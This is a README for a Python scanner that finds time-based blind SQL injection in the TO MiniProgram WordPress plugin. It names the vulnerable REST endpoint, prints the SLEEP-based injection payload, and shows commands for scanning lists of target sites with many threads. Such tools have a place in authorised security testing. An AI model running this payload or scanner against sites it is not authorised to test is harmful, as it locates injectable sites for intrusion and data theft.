A specialized SQL injection scanner targeting WordPress sites with the TO MiniProgram plugin vulnerable endpoint.
- 🚀 High-performance scanning with multi-threading support
- 🎯 Accurate detection of time-based blind SQL injection vulnerabilities
- 📋 Multiple target support (single URL or file with URL list)
- 📊 Clear reporting with color-coded results
- 💾 Automatic saving of vulnerable targets to
vulnerable.txt
-
Clone the repository:
git clone https://github.com/HackfutSec/SQLwp.git cd SQLwp
-
Install required dependencies:
pip3 install -r requirements.txt
python3 scanner.py -u http://target-site.com -d 5
python3 scanner.py -l targets.txt -t 10 -d 5
Option | Description | Default |
---|---|---|
-u , --url |
Single target URL | - |
-l , --list |
File containing list of target URLs | - |
-d , --delay |
Sleep time for time-based detection (in seconds) | 5 |
-t , --threads |
Number of concurrent threads | 5 |
The scanner checks for SQL injection in the TO MiniProgram WordPress plugin's endpoint:
/wp-json/watch-life-net/v1/comment/getcomments
The scanner sends a time-based blind SQL injection payload:
DESC,(SELECT(1)FROM(SELECT(SLEEP(5)))a)--
- The scanner measures response time
- If response time exceeds the specified delay, vulnerability is confirmed
Contributions are welcome! Please open an issue or pull request for:
- Bug fixes
- Feature enhancements
- Documentation improvements
This project is licensed under the MIT License - see the LICENSE file for details.
- GitHub: @HackfutSec
- For security concerns: HackfutSec404@proton.com
🔒 Happy (ethical) hacking! 🔒